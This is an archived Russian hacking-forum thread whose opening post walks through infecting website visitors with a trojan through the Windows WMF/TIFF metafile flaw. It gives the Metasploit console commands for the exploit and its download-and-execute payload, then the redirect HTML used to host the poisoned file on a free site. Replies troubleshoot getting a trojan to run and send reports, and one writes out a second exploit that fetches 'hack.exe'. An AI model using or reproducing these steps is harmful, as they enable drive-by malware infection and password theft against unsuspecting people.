PDA

Просмотр полной версии : Раздача Троя (Или Metasploit Framework часть 2)


-=lebed=-
13.07.2006, 15:01
Раздача троя
Предисловие.
Наверно многие пользователи ПК с Windows, выходя в интернет, лазая по Web-сайтам или просто общаясь по аське, некоторое время, ничего не скачивая и не запуская, обнаруживали у себя различного рода вредоносные программы (вирусы), в последствии удаляли их антивирусом, ставили файрвол и спали спокойно, не задумываясь над тем, каким образом они проникли на Ваш компьютер.
Так было с Windows 2000, XP Sp1. Cетевые черви, эксплуатирующие уязвимости в сервисах DCOM, LSASS безпроблем сами проникали в Ваш компьютер, без каких либо действий с Вашей стороны (за исключением выхода в инет) превращая Ваш компьютер в компьютер-зомби или скрипткидисы, сканируя диапазоны IP-адресов на бажные (дырявые) сервисы, проникали на Ваш комп, делая, что их душе угодно (автороутер KAHT2).
Но вскоре вышел SP2 для Windows XP, пославший всех известных сетевых червей куда подальше, прикрывший все дыры в бажных сервисах. Все успокоились на некоторое время, но не тут то было, лазая по сайтам, ничего не скачивая и не запуская на Вашем компе через некоторое время, снова обнаруживается зараза. Вы спросите как это возможно? Как это происходит? Просто занимаясь Веб-серфингом, Вы не скачиваете exe, com, bat,cmd,scr – представляющие потенциальную угрозу (а если скачиваете, то проверяете антивирусом перед запуском), но вы скачиваете много других файлов разных форматов – html, графических, музыкальных, видео и других. Ну и что, скажете Вы, они же неисполняемые!? М..да и будете правы – они не исполняемые, они обрабатываемые Вашим браузером, системой.
(Прим.: опустим здесь уязвимости движка IE в выполнении каких либо скриптов, функций – это отдельная большая тема). Многие поняли к чему я клоню. До некоторого времени считалось, что картинки (файлы форматов jpg, wmf, tiff) не могут содержать вирус – теперь это не так. Могут! Ведь кто Вам мешает записать туда кусок исполняемого кода и когда такой файл будет обрабатываться системой (системной библиотекой) передать управление на тот кусок исполняемого кода? Вопрос в том, как туда передать управление? Правильно! Искать, находить и использовать уязвимости в обработке системой специально сгенерированных файлов, тем или иным образом компрометирующих систему (проще говоря, заставляющих систему дать сбой при их обработке). Что и было сделано уже до нас в 2004-2005 годах и делается и по сей день…

1.Выбираем уязвимость.
Будем использовать уязвимость в обработке метафайлов системной библиотекой shimgvw.dll, существующую во всех системах WINDOWS, начиная с версии 3.хх и не только.
Подробности уязвимости тут:
http://www.securitylab.ru/vulnerability/243581.php
http://www.xakep.ru//magazine/xa/086/066/1.asp
http://www.xakep.ru/post/29503/default.asp
http://www.xakep.ru/post/28680/default.asp
http://www.xakep.ru/post/29529/default.asp- патч, закрывающий дыру.

2.Наша задача: Залить посетителю сайта исполняемый файл и передать ему управление.
Наш клиент: Система не пропатченые Windows XP, XP SP1, XP SP2, 2000, 2003. ( Прим. Win2003 server при дефалтной настройке безопасности не пробивается).
Мы : Система Windows SP2 (тоже не патченая) с установленным пакетом Metasploit Framework v.2.6. для Cygwin (win32)

3. Подготовка.
Для начала определимся с хостом в инете, где будет лежать тот исполняемый наш файл, который будет скачан при заходе клиента на нашу WEB-страницу. Пусть это будет http://nash.site.ru например. У меня пока http://localhost. Определились (это параметр будущей начинки нашего сплоита, чтоб знал, что и откуда грузить).

4. Готовим ядовитый tiff - файл.(содержащий эксплоит и начинку - загрузчик нашего экзешника)
Запускаем пакет (консоль MFV)
а) Выбираем сплоит (ie_xp_pfv_metafile):

+ -- --=[ msfconsole v2.6 [145 exploits - 75 payloads]

msf > ls
framework perl.exe.stackdump run_msfupdate userguide.pdf
framework.tar run_msfconsole run_msfweb
msf > cd framework
msfconsole: chdir: changed to directory framework
msf > use ie_xp_metafilemsf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile >

б)задаём параметры:

msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
LHOST -> 10.0.0.1
msf ie_xp_pfv_metafile >

в)Выбираем начинку, нам нужно скачать и исполнить, ок, нет проблем, посмотрим сначала что у нас есть из начинок.

msf ie_xp_pfv_metafile > ls payloads
Empty.pm linux_ia32_reverse_xor.pm
bsd_ia32_bind.pm linux_sparc_bind.pm
------ пропущено ---------------------------------------
cmd_unix_reverse_bash.pm win32_downloadexec.pm
------ пропущено ---------------------------------------
linux_ia32_reverse_udp.pm win32_reverse_vncinject.pm
msf ie_xp_pfv_metafile >

Win32_downlodexec - вот оно самое! Название начинки говорит само за себя, посмотрим по ней инфу

msf ie_xp_pfv_metafile > info win32_downloadexec

Name: Windows Executable Download and Execute
Version: $Revision: 1.1 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 340
Keys: noconn

Provided By:
lion[at]cnhonker.com
pita[at]mail.com

Available Options:
Options: Name Default Description
-------- ------ ------- ------------------------------
required URL Complete URL to the target EXE

Advanced Options:
Advanced (Msf::Payload::win32_downloadexec):
--------------------------------------------
Description:
Download an EXE from a HTTP URL and execute it

msf ie_xp_pfv_metafile >

Ага! Скачивает exe-файл с HTTP URL (c web-страницы по протоколу HTTP) и запуcкает его, то что надо!
Опция URL - там где распалагается наш экзешник. Не забудем её установить...
И так - берём эту начинку - она нам подходит.

msf ie_xp_pfv_metafile > set PAYLOAD win32_downloadexec
PAYLOAD -> win32_downloadexec
msf ie_xp_pfv_metafile(win32_downloadexec) >

г) Устанавливаем переменную URL (HTTP адрес нашего экзешника в инете, я локально запустил свой сервак Apache и кинул в корень экзешник VirtualGirl, в самораспаковывающемся архиве vr.exe - вируальные тёлки вылезающие справа экрана будут мне показывать стриптиз ;-))

msf ie_xp_pfv_metafile(win32_downloadexec) > set URL http://10.0.0.1/vg.exe
URL -> http://10.0.0.1/vg.exe
msf ie_xp_pfv_metafile(win32_downloadexec) >

д)Ну всё готово! Командуем exploit

msf ie_xp_pfv_metafile(win32_downloadexec) > exploit

Waiting for connections to http://10.0.0.1:8080/

Подняли ещё один (помимо Апача) локальный WEB сервер на 8080 порту с нашим сплоитом. Заходим на него через браузер сами и автоматом скачиваем ядовитый tiff файл (благо настройка безопасности броузера IE6 это разрешает и не блокирует автоматическую загрузку tiff-файла)

HTTP Client connected from 10.0.0.1:4401, redirecting...

HTTP Client connected from 10.0.0.1:4403, sending 1500 bytes of payload...

Всё! Появлеяется красный значок "2" в трее и тёлки начинают периодически вылезать справа внизу экрана, весело танцевать и раздеваться, правда не доконца - версия триальная ;-(

ж) Разбираемся что же произошло и как это может быть? Был автоматически загружен ядовитый tiff-файл, содержащий наш сплоит и начинку (загрузчик), далее он был открыт программой просмотр факсов (была подгружена бажная dll не без помощи rundll32.exe, которая потеряла управление и передала его на наш загрузчик, он в свою очередь загрузил наших тёлок (файл vg.exe) с Web-сервера Апач и запустил, после чего они стали благополучно танцевать на моём рабочем столе ;-)
Находим наш ядовитый tiff - файл - это готовый наш эксплоит (содержит собсвенно сам сплоит, начинку загрузчик со всеми параметрами). Он лежит в c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\ Его имя типа что-то 1D5TRR3e0[1].tiff (размер всего 28Кб.) проверим Антивирусом Касперского этот файл. Он скромно нам сообщает о том, что файл "возможно является потенциально опасным ПО Exploit.Win32.IMG-WMF" всё так и есть на самом деле (наш загрузчик - не такая уж опасная начинка сполита, всё зависит от того что он грузит и запускает, а вместо наших, безобидно пляшущих тёлок, можно загрузить и троя ворующего пароли) Убъём процесс плящущих тёлок (VirtuaGirl2.exe,Vg.exe - был обычный самараспаковывающийся в system32\vg архив с последующим запуском самой проги VirtuaGirl2.exe) и попробуем просто посмотреть папку с ядовитым tiff файлом в стандартном проводнике Windows, Опс! Тёлки опять пляшут у нас на экране! (Снова подгрузилась бажная DLL c помошью rundll32.exe и сделала своё чёрное дело)! Всё проверено, наш подопытный Tiff-файл превратился в успешно исполняемый (на не пропатченных системах Win).

5. Вешаем сплоит в интернете на своём сайте.
Так как в параметре URL (для начинки загрузчика) мы указали http://localhost/vg.exe нам придётся пересобрать ядовитый Tiff файл с другими параметрами.
а) Выбираем что будем грузить (исполняемый exe-файл). Я взял картинку (женскую задницу с паутинкой на ней), открыл в фотошопе, дописал текст "Заштопайте дырку в Вашей системе", сохранил в формате JPG, затем открыл инфравьювером и сделал из неё исполняемый экзешник, обозвал его picture.exe.

б) Выбираем host в интернете.
Я зарегал себе сайт на народе http://vulnerabilitywmf.narod.ru/, на главной странице сделал ссылку на http://vulnerabilitywmf.narod.ru/Testwmf.html и обозвал её тест на WMF-баг.

в) Готовим новый ядовитый tiff-файл (см. п 4)
Всё делаем тоже самое, только задаём наш новый URL, где будет лежать наш picture.exe.

msf ie_xp_pfv_metafile(win32_downloadexec) > set URL http://vulnerabilitywmf.narod.ru/picture.exe
URL -> http://vulnerabilitywmf.narod.ru/picture.exe

Содержание Testwmf.html - это всего лишь переадресация на наш ядовитый tiff файл. Его содержание мы получим, если посмотрим HTМL код (когда будем открывать ссылку у себя с локально поднятого Metasploit`ом Framework WEB-сервера, нам лишь нужно изменить ссылку переадресации на народовскую и сохранить под именем Testwmf.html. Сам сформированный таким образом tiff- файл возьмём из c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\, обзовём Sploit.tiff. Закачаем в корневую папку нашего Web-сервера на народе эти два файла Testwmf.html, Sploit.tiff, а также не забудем наш picture.exe, который будет скачиваться с сайта, запускаться и выводить картинку о том что Ваша система уязвима к WMF-багу. Всё готово!

Содержание файла Testwmf.html

<html><meta http-equiv='refresh' content='0;
URL=http://vulnerabilitywmf.narod.ru/Sploit.tiff'><body><div class='kMM5zm0Z82kjbGwPCrIz3s4NdTqA3q7AJIuWcqUXECe K25CbzHHCAD23COOjdba23A3UXfOV08bs3TyJadiD4HDQsi6Pl cTeIAPSZ8IAR7EyhZjGyaVHvma1m6bdhDQrsolEK0N3jAWSE7I 5Vdrka3Cm3Eh4xoZsCEoo99Dd0v26nnV5OMBUV1swSohhVQDhQ wP4DpaeBiUi3cAsYFeGwWBIYEVL9P0K7agPzmlqP4RuhYTxHs4 a7n89igzS9inVrxXM0fjjjMSH27Y3xdCPTK6VNo9N2M2FS58C4 1vzFuSXMEfclePUznS8L3bhULrn6fhQSgqgZHPgN1TrTPrUbOQ nRKkGdscYyVIMskJCjxBOTvn13XwhYBgKtTL7H6BDyH2PNwX3N CrK7giEXHKb4y7wL7oEavd1sI6gmalISNCesj0bg8DzmBPIV5n 7hWqHVfF9FvmwARRZkMnqiAAuX5nrJTY7lxJiOMF8V63rOnPz7 Mu86VBHwBQ2x8dqxIwQVmcSsPhjOOrBuP5YHVPAL0EZInI2z05 XP9Sm9GyX5E5cQwygO4zpTuBg1lHbKqRKSQTdLRl0M3zsPmBt7 jaUXI2WS3EIDvRGV22mA3VdCP7Yl9wjJj3f7xfKxBfLHJEMYBj 7Lg9hmyNLUfjyv3oTDndxsTMipsFZ3uXtlQRrGDa7IUjlbJLHP WV7KtPWxcVN2hpYWyO'></div>One second please...</body></html><!-- ><!-- "><!--'><!-- --></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->

Это уже после того, как он был залит на народ.ру.
Результат работы тут: (http://vulnerabilitywmf.narod.ru/)

-=lebed=-
14.07.2006, 15:49
Сделал сайт на народе для тестирования IE6 (WINDOWS XP SP2) с настройкой безопасногсти браузера по умолчанию, кто хочет провериться - заходите (оперой не катит, только если сохранить файл Sploit.tiff, а потом глянуть его свойства например). Виря нет, не бойтесь, там безобидный экзешник грузится, сделанный инфравьювером и выводит картинку о том что ваша система уязвима!
Отпишитесь плиз, те кто затестил.... в поненельник напишу как это сделал подробно....
Уже написал, см. п 5 статьи.
Ссылка для проверки (http://vulnerabilitywmf.narod.ru/)

zeppe1in
14.07.2006, 16:42
Я тестил, на мне не работает. Я и с Metasploit Framework на себе тестил тоже не пашет.
Зато если в тотал командере нажимаю свйства фаила тифф то всё работает. А если в проводнике свойства, то "Для защиты компьютера эта программа была закрыта системой".
Такие дела.

-=lebed=-
14.07.2006, 17:00
Я тестил, на мне не работает. Я и с Metasploit Framework на себе тестил тоже не пашет.
Зато если в тотал командере нажимаю свйства фаила тифф то всё работает. А если в проводнике свойства, то "Для защиты компьютера эта программа была закрыта системой".
Такие дела.
Не всегда бажная библиотека подгружается.... поэтому и не всегда работает. Поставил чистую винду с нуля на виртуал PC захожу на сайт- всё работает как часы... (Правда файловая система FAT32, а не NTFS)

zeppe1in
14.07.2006, 22:31
По этому придётца юзать лаговый ie_createtextrange:).
ps: кстати спасибо за статьи, теперь я знаю крутую штуку - метасплойт.

Electro
17.07.2006, 23:46
Сделал сайт на народе для тестирования IE6 (WINDOWS XP SP2) с настройкой безопасногсти браузера по умолчанию, кто хочет провериться - заходите (оперой не катит, только если сохранить файл Sploit.tiff, а потом глянуть его свойства например). Виря нет, не бойтесь, там безобидный экзешник грузится, сделанный инфравьювером и выводит картинку о том что ваша система уязвима!

Тестил! Значит так ...вопервых у меня сразу довнолоудер выскачил ..начал качать ..на половине дороги гаишник остоновил ...и сказал что у вас на багаже бактереологическое оружия (Exploit WMF троян)
...дал гаишнику взятку и сохранил на машине потом выскачил ж**а с паутиной в дырке :D
Пиши продолжения статьи ...чё то затянуло

-=lebed=-
18.07.2006, 00:49
Тестил! Значит так ...вопервых у меня сразу довнолоудер выскачил ..начал качать ..на половине дороги гаишник остоновил ...и сказал что у вас на багаже бактереологическое оружия (Exploit WMF троян)
...дал гаишнику взятку и сохранил на машине потом выскачил ж**а с паутиной в дырке :D
Пиши продолжения статьи ...чё то затянуло
Спасибо антивирю - подстраховал а система сама дырявая как видишь....

Electro
19.07.2006, 13:20
Спасибо антивирю - подстраховал а система сама дырявая как видишь....
Я уже пропачтил машину ...но посде этого не испытывал есь честно.
Ты мне вот что скажи msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
это параметр так?! Ты этот параметр задал потому что у тя локалхост , а вот я хотел на серваке испытать че то не вышло .... какой параметр нужно задать для сервака? я не могу задать айпи сервака у меня не выделенный сервер
И еще msf ie_xp_pfv_metafile(win32_downloadexec) > exploit
Waiting for connections to http://my-site/
У меня останавливается вот тут а потом ничего не присходит! И где сохраняется этот зараза тифф?? Просто на вирей не тестиривал этот сплоит вот интересно стало ....

-=lebed=-
19.07.2006, 14:05
Я уже пропачтил машину ...но посде этого не испытывал есь честно.
Ты мне вот что скажи
это параметр так?! Ты этот параметр задал потому что у тя локалхост , а вот я хотел на серваке испытать че то не вышло .... какой параметр нужно задать для сервака? я не могу задать айпи сервака у меня не выделенный сервер
И еще
У меня останавливается вот тут а потом ничего не присходит! И где сохраняется этот зараза тифф?? Просто на вирей не тестиривал этот сплоит вот интересно стало ....
LHOST - да, параметр - локальный адрес IP, (я пробовал и внешний использовать - то же прокатывало) вообще-то он в основном нужен для начинок. WEB - сервер у меня поднимается на том же компе, где и стоит пакет Metasploit Framework - т. е. локально, (через NAT можно сделать чтоб он светил и в инет, и был доступен от туда). Я же использую получившийся tiff файл (готовый уже сплоит) и мне уже не надо поднимать WEB сервак Metasploitom каждый раз. Где он есть? Он висит на серваке, поднятым Metasploitom, в явном виде - (в виде файла на диске) его ещё ИМХО нет. Забрать его можно, зайдя браузером IE на этот сервак, в папке временные файлы интернета он там уже будет потом.
А если ты спрашиваешь где у Web-сервера, который поднимает Metasploit корневая папка на диске, то я вообще не уверен что она есть (ИМХО всё в оперативке только висит).
2 Останавливается - правильно - ждёт подключений (захода юзера браузером на этот web-сервер)

-=lebed=-
26.07.2006, 12:26
По этому придётца юзать лаговый ie_createtextrange:).
ps: кстати спасибо за статьи, теперь я знаю крутую штуку - метасплойт.
Провериться на баг в функции createtextrange можно Тут (http://vulnerabilitywmf.narod.ru/createtextrange.html)
P.S. С маленькой виртуальной памятью по ссылке не ходить (съёдает около 1 Гб.)
Затестил на Virtual PC, предварительно отдав 2 Гб. под файл подкачки, всё работает, только медленно... Сплоит так себе.....но рабочий.... Кто нибудь знает как его доработать чтоб столько свопа IE не сжирал?

Федя
26.07.2006, 14:11
Жопа сработала!
Захожу с оперы 9 - качается tiff, затем outpost рубит исход. соединение от EXPLORER.EXE
Скриншот: http://bla527.jino-net.ru/wmf.jpg
Разрешил - жопа открылась!
РЕСПЕКТ ЛЕБЕДЮ!

З.Ы. OPERA 7 rulez ; OPERA 9 MUST DIE!

-=lebed=-
26.07.2006, 14:23
Жопа сработала!
Захожу с оперы 9 - качается tiff, затем outpost рубит исход. соединение от EXPLORER.EXE
Скриншот: http://bla527.jino-net.ru/wmf.jpg
Разрешил - жопа открылась!
РЕСПЕКТ ЛЕБЕДЮ!

З.Ы. OPERA 7 rulez ; OPERA 9 MUST DIE!
Спасибо скажи Аутпосту! Кстати браузер здесь почти не причём, Tiff-файл можно чем угодно закачать.
Тесть дыру IE6 в функции createtextrange тут (http://vulnerabilitywmf.narod.ru/createtextrange.html)
Жопа должна быть та же....

Федя
26.07.2006, 14:27
Эта хрень ещё и кешируется? Я, не подключенный к инету, зашёл в свойства того тиффа и опять жопа! Крутой сплойт... :)

-=lebed=-
26.07.2006, 14:50
Эта хрень ещё и кешируется? Я, не подключенный к инету, зашёл в свойства того тиффа и опять жопа! Крутой сплойт... :)
Жопа - это скаченный файл picture.exe в директории system - удали его и всё, это он выводит картинку (совсем не опасен), а прикинь если был приватный трой!?

Федя
26.07.2006, 15:52
Слушай, -=lebed=-, а где взять этот пакет?

-=lebed=-
26.07.2006, 16:08
Читай первую часть статьи Metasploit Framework для ламеров (http://forum.antichat.ru/thread21599.html) , там ссылки, а вообще ТУТ (http://metasploit.com/)

Федя
26.07.2006, 16:23
Сижу качаю. В тот раз малясь не то скачал, а твою ссылку download master не съел почему-то. Кста, мышкой на тифф наводишь и опять ... э... ЖЭ...
В общем всё, отваливаю. Извини за оффтоп!

DCRM
12.12.2006, 21:01
А у меня такой прикол.. вроде откомпилировал сплоит, всё как положено! Залил на сайт... начинается закачка сплоита... далее ругается ошибка(как и должно быть :) ) и... всё... файл не скачивает! :mad:

И createtextrange - жопы нет! Но 2 гига отжирает только так! :) а самому сделать это...:

use ie_createtextrange
set PAYLOAD Win32_downlodexec
set URL www.dark-krimson.narod.ru/hack.exe
exploit
Лезу по адроесу, хаваю HTML код, выплёвываю на свой сайт... - Как и ожидалось, память забивает, а файл не скачивает... :confused:
www.dark-krimson.narod.ru/hack.html

-=lebed=-
28.12.2006, 16:01
ie_createtextrange - не всегда пашет!

Ky3bMu4
24.02.2007, 22:04
Плиз , не ругайтесь.
Столкнулся с проблемой. Хост меняю на адрес сайта, а при комманде exploit, всё равно наровит на мой ip законектится.

-=lebed=-
24.02.2007, 22:51
Плиз , не ругайтесь.
Столкнулся с проблемой. Хост меняю на адрес сайта, а при комманде exploit, всё равно наровит на мой ip законектится.
Какой параметр? LHOST ? Какой сплоит, какая начинка ?
П.С. Сплоит на чужом хосте так просто не повесить...

Ky3bMu4
24.02.2007, 22:55
Всё по инструкции. Тока Host , не Lhost. Ну раз непросто повесить, то пусть на моём висит.

-=lebed=-
24.02.2007, 23:06
Регайся на бесплатном хостинге - потом вешай сплоит в инете (закачивай вредоносную страничку на хостинг). Host - в статье не параметр (имелось виду выбрать бесплатный хостинг).

Aerot1smo
27.02.2007, 20:53
у меня нехочет запускатся трой.
все делаю как в статье .тиф запускается но сам трой нет(отчёты не идут)что я нетак делаю?

-=lebed=-
27.02.2007, 23:31
у меня нехочет запускатся трой.
все делаю как в статье .тиф запускается но сам трой нет(отчёты не идут)что я нетак делаю?

Мало написал.
Скажу что проблем может быть несколько:
1. Система не уязвима к WMF-багу (пропатчена).
2. Стандарный просмотр факсов заменён другой программой (не использующей бажную dll)
в этих случаях не сработает сплоит для IE
3. Ошибки в сборке сплоита (параметры начинки и т. п.)
4. Хостинг-провайдер, файр, антивирус и т. д. блокирует (режет) загрузку вредоносного кода. (как шеллкода- загрузчика трояна, так и передачу самого троя).
5. Не правильно настроян сам троян - раз отчёты не шлёт (не всякий бесплатный почтовый хостинг принимает отчёты троянов).

P.S. Вообщем ставь под виртуалкой чистую XP SP2 и проверяй всё на ней сначала - всё должно работать (можешь убедиться, пройдя по ссылке у меня в подписи).

NOmeR1
28.02.2007, 00:09
-=lebed=-
Если бы ты бы ещё видео записал, то цены бы тебе не было!

-=lebed=-
28.02.2007, 18:29
-=lebed=-
Если бы ты бы ещё видео записал, то цены бы тебе не было!
Снял видео (правда по мотивам первой части) рабочее название: "Убиваем троя" :D (взломав комп друга и убив процесс и файлы трояна удалённо). Отослал на video@antichat.ru - ждите когда админы выложат...

timphp
05.06.2007, 17:35
-=lebed=-

Чёта последнее время 2.7(ie_xp_pfv_metafile) вообще не конектиЦЦа ...
WIN-XP-SP1 уже не у кого нет,есть чё нибудь новое для удалённого ???

xaker-boss
05.06.2007, 18:33
-=lebed=-
Люди сделайте ктонебуть видео манул по созданию плиз.вить не однаму мне это надо. с нас +

-=lebed=-
07.06.2007, 18:24
-=lebed=-
Люди сделайте ктонебуть видео манул по созданию плиз.вить не однаму мне это надо. с нас +
Уже сделано тыкай на диск у мну в подписи качай видео и смотри...

xaker-boss
08.06.2007, 16:55
Да видео палучилось прикольное, лови + за свои старания!

Astro
20.06.2007, 14:27
За статью спасибо, хорошо написано. Но есть один вопрос, у меня локалка, IP выдает DHCP сервак, есть локальный веб-сервер. Писал в параметр LHOST и localhost ,и 127.0.0.1 ,и свой IP, который выдает DHCP сервер, но эксплоит ждет соединения на мой внешний IP, через который я выхожу в инет. Можно ли как-то настроить LHOST на свой локальный веб-сервак, мне просто на себе испытать хочеться.

-=lebed=-
20.06.2007, 14:58
За статью спасибо, хорошо написано. Но есть один вопрос, у меня локалка, IP выдает DHCP сервак, есть локальный веб-сервер. Писал в параметр LHOST и localhost ,и 127.0.0.1 ,и свой IP, который выдает DHCP сервер, но эксплоит ждет соединения на мой внешний IP, через который я выхожу в инет. Можно ли как-то настроить LHOST на свой локальный веб-сервак, мне просто на себе испытать хочеться.

1. Пропиши в файл hosts (лежит в c:\WINDIR\system32\drivers\etc\) 127.0.0.1 localhost
2. Заходи браузером на 127.0.0.1
3. Смени параметр LPORT например на 81 или ещё какой другой, так как 80 или 8080 могут быть уже заняты локальным вебсервером (Метасплоит поднимает свой вебсервер).
4. Пробуй зайти браузером на 127.0.0.1:81 или назначенный_локальный_DHCP_с рвером_IP:81 или netbios_name:81

romasjan
25.02.2008, 17:08
блин как просмотреть видео ? на какой диск тыкнуть

-=lebed=-
25.02.2008, 20:44
видео тут: http://video.antichat.ru/file226.html
PS диск в подписи раньше был, щас нету уже.

xJeWeL
26.02.2008, 14:57
Протестировал сайт.
Стоит Капер 7 Kis + все обновления + Ie7
Что не видет каспер как вирус , то не обрабартывает Ie.
По этому вирусняк не пролез. Статья классная.

-=lebed=-
27.03.2008, 23:00
Зделал все как положено, тиф загружается и открывается как картинка, но прилепленый трой не загружается и не заупскается соответсвенно, переделывал пару раз.. трой рабочий
Чем открывается картинка? У начинки downloadexec все параметры верно указал?

lamkO?
13.05.2009, 15:25
Сейчас это актуально?

TRX.new
19.05.2009, 13:40
Сейчас это актуально?
Актуально, но не в такой сетепени как раньше, ведь уже немалое количество народу перешло на SP3.. Но я уверен есть и те, у кого дыра в этом месте =))..